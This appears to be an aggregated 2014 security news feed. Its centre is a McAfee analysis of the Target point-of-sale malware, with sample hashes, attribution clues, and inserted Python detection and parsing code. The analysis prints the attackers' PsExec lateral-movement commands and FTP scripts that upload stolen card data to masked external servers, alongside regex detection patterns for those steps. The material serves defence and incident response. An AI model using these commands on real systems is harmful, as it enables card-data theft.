2014 Threats Predictions: Malware to Take Advantage of Hotspots, Gaming Consoles

This post is the last in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Craig Schmugar.

Renewed interest in small-office and home-office router hacking, and an uptick in successful exploitations will lead to an increase in WiFi hotspot–related threats. This threat vector will lead to more cross-platform attacks. Public access points are especially worrisome because any system on the network can be impacted by an infected computer that had previously connected to the same hotspot.

With the increasing versatility of Internet-connected gaming consoles, the chances of randomly downloading malware while browsing or installing an app are also increasing. Fueled by the 2013 releases of the Microsoft Xbox One and Sony PlayStation 4, we expect attacks on these platforms to grow in proportion with their adoption.

The post 2014 Threats Predictions: Malware to Take Advantage of Hotspots, Gaming Consoles appeared first on McAfee.

Analyzing the Target Point-of-Sale Malware

January 21, 2014: As more information surrounding these events comes to light, we continue to identify and analyze additional components and behaviors. To shed more light on the malware specific to these events, our team in McAfee Labs has released an updated Threat Advisory entitled “McAfee Labs Threat Advisory: EPOS Data Theft”. The report covers specific traits and activity of this family, along with some background on “BlackPOS”. Updated details on McAfee countermeasures and mitigation are included as well.

McAfee Labs Threat Advisory: EPOS Data Theft

Current AV Detections:

  • 6597DF782CBD7DC270BB12CDF95D21B4  BackDoor-FBPP
  • 5DBD7BC7A672DA61F6F43AAF6FA3C661  BackDoor-FBPP
  • BA443C2E10D0278FC30069F61BC56439  BackDoor-FBPP
  • 7F9CDC380EEED16EAAB3E48D59F271AA  PWS-FBOI
  • 3D5BF67955DC77AF4CA8BF6CB1F96065  PWS-FBOI
  • BA0F556CE558453AD1526409B5B69EF3  PWS-FBOI
  • F45F8DF2F476910EE8502851F84D1A6E  PWS-FBOJ
  • CE0296E2D77EC3BB112E270FC260F274  PWS-FBOJ
  • 4D445B11F9CC3334A4925A7AE5EBB2B7  BackDoor-FBPL
  • 7F1E4548790E7D93611769439A8B39F2  BackDoor-FBPL
  • 762DDB31C0A10A54F38C82EFA0D0A014  BackDoor-FBPL
  • C0C9C5E1F5A9C7A3A5043AD9C0AFA5FD  BackDoor-FBPL

Additional Countermeasures

  • McAfee Application Control - Run-Time Control locks down systems and provides protection in the form of Execution Control and Memory Protection.

Malware of this variety will typically be targeted. The adversaries will actively attempt to evade AV detection where possible, so it is critical to apply countermeasures outside the typical AV scanning procedures. Application Control/Whitelisting will be extremely effective in blocking or inhibiting these tools. In addition, network monitoring and controls (real-time monitoring and intelligent analytics of SIEM data) will allow victims to know exactly what malicious behaviors are occurring in their environment at the time of compromise, and where the artifacts/indicators are.

January 16, 2014: In the last 24 hours, McAfee Labs has started to piece together more and more detail on the malware that is apparently tied to the campaign against Target. To recap, in November 2013 the retailer was compromised via undisclosed methods. The attackers were able to plant point-of-sale malware and intercept approximately 110,000,000 records worth of payments, transactions, and other personally identifiable data. Working backward, we can start to see evidence of the activity in December (prior to the story’s breaking) based on underground chatter, VirusTotal submissions, and other open-source intelligence sources.

Although there is no official confirmation, we have credible evidence to indicate that the malware used in the Target stores attack is related to existing malware kits sold in underground forums. Related samples to date are somewhat similar in function to (and possibly derived from) known “BlackPOS” samples.

Sample Information/Sources

  • ce0296e2d77ec3bb112e270fc260f274 – ThreatExpert (cache)
  • f45f8df2f476910ee8502851f84d1a6e – ThreatExpert (cache)
  • 7f1e4548790e7d93611769439a8b39f2 – VirusTotal
  • 4d445b11f9cc3334a4925a7ae5ebb2b7 – VirusTotal
  • 762ddb31c0a10a54f38c82efa0d0a014 – VirusTotal
  • c0c9c5e1f5a9c7a3a5043ad9c0afa5fd – VirusTotal

7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 are uploaders that reveal many useful details about data collection, data transfer, and possibly the actor behind the campaign.

Possible Actor/Attribution Data

Both uploaders contain the following string (a PDB compile path left in the binary):

  • z:\Projects\Rescator\uploader\Debug\scheck.pdb

Rescator is a known actor in various cybercrime forums.
Data Collection and Transfer

Data is collected and transferred to internal shares via the following command syntax:

  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\<EPOS_IPaddr> -u <username> -p <password> cmd /c “taskkill /im bladelogic.exe /f”
  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\<EPOS_IPaddr> -u <username> -p <password> -d bladelogic
  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c move \\<EPOS_IPaddr>\nt\twain_32a.dll c:\program files\xxxxx\xxxxx\temp\data_2014_1_16_15_30.txt
  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt

Note: The reference to “bladelogic” is a method of obfuscation. The malware does not compromise, or integrate with, any BMC products in any way. The executable name “bladelogic.exe” does not exist in any piece of legitimate BMC software.

“ttcopscli3acs” is reportedly a Windows domain name used within Target stores.
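The four command lines above are the part of this activity that a defender can actually see on the network-side host: PsExec run with explicit credentials, the bladelogic.exe kill/restart, the rename of the EPOS share's twain_32a.dll into a data_YYYY_M_D_HH_MM.txt staging file, and ftp.exe driven by a script. The following detection logic is an added example written for this article, not McAfee code; it assumes process-creation records reduced to (hostname, command line) pairs, and the hostnames, IP addresses, account names and the vendor\app path in the sample records are constructed stand-ins for the values the page masks.

```python
"""Correlate the PsExec -> bladelogic -> move -> ftp chain across process-creation records.

Added example for the Target POS write-up; not McAfee code. Input format is an
assumed simplification: an iterable of (hostname, command_line) tuples.
"""
import re
from collections import defaultdict

# One pattern per stage of the chain quoted in the article. Case-insensitive
# because cmd.exe command lines are.
STAGES = {
    # psexec with an explicit -u/-p pair; common for admins too, so never alert on it alone
    "psexec_with_creds": re.compile(r"\bpsexec(?:\.exe)?\b.*?\s-u\s+\S+\s+-p\s+\S+", re.I),
    # taskkill of the fake 'bladelogic.exe' (no legitimate BMC binary has this name)
    "kill_bladelogic":   re.compile(r"taskkill\s+/im\s+bladelogic\.exe", re.I),
    # detached (-d) restart of the same fake binary through psexec
    "start_bladelogic":  re.compile(r"\bpsexec(?:\.exe)?\b.*?\s-d\s+bladelogic\b", re.I),
    # the scraped data, parked on the EPOS 'nt' share as twain_32a.dll, pulled back and renamed
    "stage_twain_dll":   re.compile(r"\bmove\s+\\\\[^\s\\]+\\nt\\twain_32a\.dll\s", re.I),
    # Windows ftp.exe fed by a script file (-s:<path>) - the exfil step
    "ftp_script_exfil":  re.compile(r"\bftp(?:\.exe)?\s+-s:", re.I),
}

# UNC targets (\\host) on a command line: the EPOS systems the attacker touched
UNC_HOST = re.compile(r"\\\\([^\s\\]+)")


def classify(cmdline):
    """Return the set of stage names whose pattern matches this command line."""
    return {name for name, rx in STAGES.items() if rx.search(cmdline)}


def remote_hosts(cmdline):
    """Return every \\host referenced on the command line (psexec and move targets)."""
    return set(UNC_HOST.findall(cmdline))


def correlate(records):
    """Group stage hits by originating host and keep hosts that show the chain.

    A lone psexec -u/-p is normal administration; two or more distinct stages on
    the same host is the staging pattern described in the article.
    """
    seen = defaultdict(lambda: {"stages": set(), "targets": set()})
    for host, cmd in records:
        tags = classify(cmd)
        if not tags:
            continue
        seen[host]["stages"] |= tags
        seen[host]["targets"] |= remote_hosts(cmd)
    return {h: v for h, v in seen.items() if len(v["stages"]) >= 2}


# Constructed sample records (hostnames, addresses, credentials and the vendor\app
# path are made up; the real values are masked on the page).
SAMPLE_RECORDS = [
    ("SRV01", r'c:\windows\system32\cmd.exe /c psexec /accepteula \\10.1.5.21 -u corp\svc_pos -p Winter2013 cmd /c "taskkill /im bladelogic.exe /f"'),
    ("SRV01", r"c:\windows\system32\cmd.exe /c psexec /accepteula \\10.1.5.21 -u corp\svc_pos -p Winter2013 -d bladelogic"),
    ("SRV01", r"c:\windows\system32\cmd.exe /c move \\10.1.5.21\nt\twain_32a.dll c:\program files\vendor\app\temp\data_2014_1_16_15_30.txt"),
    ("SRV01", r"c:\windows\system32\cmd.exe /c ftp -s:c:\program files\vendor\app\temp\cmd.txt"),
    # routine helpdesk use of psexec: one stage only, must not be reported
    ("ADMIN7", r"psexec \\10.1.9.3 -u corp\helpdesk -p Pass123 ipconfig /all"),
    ("WS22", r"notepad.exe c:\users\bob\notes.txt"),
]


if __name__ == "__main__":
    for host, hit in correlate(SAMPLE_RECORDS).items():
        print(host, sorted(hit["stages"]), sorted(hit["targets"]))
```

The `targets` set is the list of EPOS addresses to pull for twain_32a.dll and the fake bladelogic.exe; the `ftp_script_exfil` hit gives the `-s:` script path whose contents reveal the destination server.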

7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 drop the following script upon execution:

open xxx.xxx.xxx.xx
cd public_html
cd cgi-bin
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_%_%_%%_%%.txt
Similar scripts are present in 762ddb31c0a10a54f38c82efa0d0a014 and c0c9c5e1f5a9c7a3a5043ad9c0afa5fd.

open xx.xxx.xxx.xx
cd 001
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt

open xx.xx.xxx.xx
cd etc
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt

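The dropped scripts are plain ftp.exe command files: `open` names the server, the next two lines are consumed as the answers to the User: and Password: prompts, `cd` walks to the drop directory, and `send` (an alias of `put`) uploads the staged file. The parser below is an added example for this article, not McAfee tooling; it turns such a script into incident-response records (server, directory, local file, and the date/time encoded in the file name). Assumptions: the IP addresses, credentials and the Vendor\POSAgent path in the sample scripts are constructed, the `%_%_%%_%%` placeholders in the page's file names are taken to stand for month, day, hour and minute as in the observed name data_2014_1_16_15_30.txt, and the whole remainder of a `send` line is treated as the local path because the page's scripts use unquoted paths containing spaces.

```python
"""Extract exfiltration targets from an ftp.exe -s: script.

Added example, not McAfee code. Sample scripts and their hosts, users and
local paths are constructed to mirror the shape of the ones on the page.
"""
import re

# data_YYYY_M_D_HH_MM.txt as seen in the move command (assumed meaning of the %
# placeholders in the script template)
DATA_FILE = re.compile(r"data_(\d{4})_(\d{1,2})_(\d{1,2})_(\d{1,2})_(\d{1,2})\.txt$", re.I)


def parse_ftp_script(text):
    """Walk the script once and return one record per send/put command."""
    host = user = None
    cwd = []
    creds_pending = 0  # lines ftp.exe will feed to its User:/Password: prompts
    sends = []
    for line in text.splitlines():
        if creds_pending:
            # ftp.exe answers the prompts with the next two lines, blank or not,
            # so an empty line here is an empty credential rather than a no-op.
            if creds_pending == 2:
                user = line.strip()
            # the password line is consumed but deliberately not recorded
            creds_pending -= 1
            continue
        stripped = line.strip()
        if not stripped:
            continue
        cmd, _, arg = stripped.partition(" ")
        cmd = cmd.lower()
        if cmd == "open":
            host = arg.split()[0] if arg else None
            cwd = []
            creds_pending = 2
        elif cmd == "cd":
            cwd.append(arg.strip())
        elif cmd in ("send", "put"):
            local = arg.strip()  # rest of line: paths with spaces are unquoted
            m = DATA_FILE.search(local)
            sends.append({
                "host": host,
                "user": user,
                "remote_dir": "/".join(cwd),
                "local_file": local,
                # (year, month, day, hour, minute) from the staging file name, if it matches
                "stamp": tuple(int(g) for g in m.groups()) if m else None,
            })
    return sends


def exfil_summary(scripts):
    """Sorted, de-duplicated (server, directory) pairs across several scripts."""
    pairs = set()
    for script in scripts:
        for rec in parse_ftp_script(script):
            pairs.add((rec["host"], rec["remote_dir"]))
    return sorted(pairs)


# Constructed sample: credentials present, as a full ftp.exe script would carry them
SCRIPT_A = r"""open 203.0.113.10
pos_upload
hunter2
cd public_html
cd cgi-bin
send C:\Program Files\Vendor\POSAgent\Temp\data_2014_1_16_15_30.txt
quit
"""

# Constructed sample in the shape of the second script on the page: empty
# credential lines after open, then the 001 directory
SCRIPT_B = r"""open 198.51.100.7


cd 001

send C:\Program Files\Vendor\POSAgent\Temp\data_2014_1_16_15_30.txt
"""

if __name__ == "__main__":
    for rec in parse_ftp_script(SCRIPT_A) + parse_ftp_script(SCRIPT_B):
        print(rec)
    print(exfil_summary([SCRIPT_A, SCRIPT_B]))
```

The (server, directory) pairs are the network indicators to block and hunt for in proxy and firewall logs; the `stamp` tuple dates each staged batch independently of file-system timestamps, which the attacker can alter.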
Compilation Dates

  • 762ddb31c0a10a54f38c82efa0d0a014 – Sat Nov 30 17:52:00 2013 UTC
  • 4d445b11f9cc3334a4925a7ae5ebb2b7 – Sat Nov 30 17:21:17 2013 UTC
  • c0c9c5e1f5a9c7a3a5043ad9c0afa5fd – Tue Dec  3 00:15:01 2013 UTC
  • 7f1e4548790e7d93611769439a8b39f2 – Sat Nov 30 17:38:23 2013 UTC
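The dates above come from the TimeDateStamp field of each sample's COFF file header, printed in ctime style (hence the double space in "Dec  3"). The reader below is an added example for this article, not McAfee code, showing how that field is located and why it is only a hint: the value is written by the linker and can be zeroed, patched or set to the future by the author, so it should be checked against first-seen dates from sources such as VirusTotal rather than trusted outright. The `fake_pe` helper builds a constructed header just large enough to parse; it is not one of the samples and not a loadable executable.

```python
"""Read the COFF TimeDateStamp from a PE image and sanity-check it.

Added example, not McAfee code. fake_pe() constructs a minimal header for
demonstration; the timestamps passed to it below are chosen to reproduce two
of the dates listed in the article.
"""
import struct
import time


def pe_timestamp(data):
    """Return the 32-bit TimeDateStamp (seconds since 1970 UTC) or raise ValueError."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)        # offset of the PE signature
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return stamp


def compile_time_utc(data):
    """Format the stamp the way the article lists it, e.g. 'Sat Nov 30 17:52:00 2013 UTC'."""
    return time.asctime(time.gmtime(pe_timestamp(data))) + " UTC"


def stamp_flags(stamp, first_seen):
    """Plausibility flags for a compile stamp given a first-seen epoch (e.g. from VirusTotal)."""
    flags = []
    if stamp == 0:
        flags.append("zeroed")                 # stripped or reproducible-build style stamp
    if stamp > first_seen:
        flags.append("after_first_seen")       # cannot be genuine; forged or clock skew
    if first_seen - stamp > 5 * 365 * 86400:
        flags.append("very_old")               # old build or back-dated stamp
    return flags


def fake_pe(stamp, e_lfanew=0x80):
    """Constructed minimal MZ/PE header carrying the given stamp (demo input only)."""
    hdr = bytearray(e_lfanew + 24)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<HHI", hdr, e_lfanew + 4, 0x14C, 3, stamp)   # i386, 3 sections, stamp
    return bytes(hdr)


# Epoch values that correspond to two of the dates in the article
STAMP_NOV30 = 1385833920   # Sat Nov 30 17:52:00 2013 UTC
STAMP_DEC3 = 1386029701    # Tue Dec  3 00:15:01 2013 UTC

if __name__ == "__main__":
    for s in (STAMP_NOV30, STAMP_DEC3):
        print(compile_time_utc(fake_pe(s)))
```

Against a real file, replace `fake_pe(...)` with the bytes read from disk; the first 0x40 bytes plus the header at `e_lfanew` are all the function touches.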


The post Analyzing the Target Point-of-Sale Malware appeared first on McAfee.

HealthCare.gov riddled with flaws that could expose user data, experts say

The federal government's HealthCare.gov website continues to be riddled with flaws that expose confidential user data to the public, a security expert testified Thursday at a hearing on Capitol Hill.

David Kennedy, founder of security firm TrustedSec, told members of the House of Representatives Science Committee that only one of 18 issues he reported in November had been fixed, and even then he identified ways that attackers could bypass the remedy. Kennedy didn't discuss specifics of the vulnerabilities out of concern that details would make it easier for criminals to exploit the weaknesses. Generally, he said some of the weaknesses leaked usernames, e-mail addresses, and other data contained in user profiles onto the open Internet, making it possible for unauthorized people to access the information using Google or other search engines. The testimony came as top security officials from the US Department of Health and Human Services (HHS), which helps oversee HealthCare.gov, were appearing before a separate House hearing.

"TrustedSec cannot state with 100 percent certainty that the back-end infrastructure is vulnerable," Kennedy wrote in a statement submitted in advance of Thursday's proceedings. "However, based on our extensive experience performing application security assessments for over 10 years, the website has the symptoms that lead to large-scale breaches for large organizations. Also note that all exposures have been reported, and TrustedSec would be more than willing to have discussions with HHS to address the security concerns."


Google Releases Google Chrome Updates

Original release date: January 16, 2014

Google has released Google Chrome 32.0.1700.95 for all Chrome OS devices (except Chromebook Pixel), Google Chrome 32.0.1700.76 for Windows and Chrome Frame, and Google Chrome 32.0.1700.77 for Mac and Linux to address multiple vulnerabilities. These vulnerabilities could allow a remote attacker to cause a denial-of-service condition, spoof the address bar, or execute arbitrary code.

US-CERT encourages users and administrators to review the Google Chrome release blog and follow best-practice security policies to determine which updates should be applied.
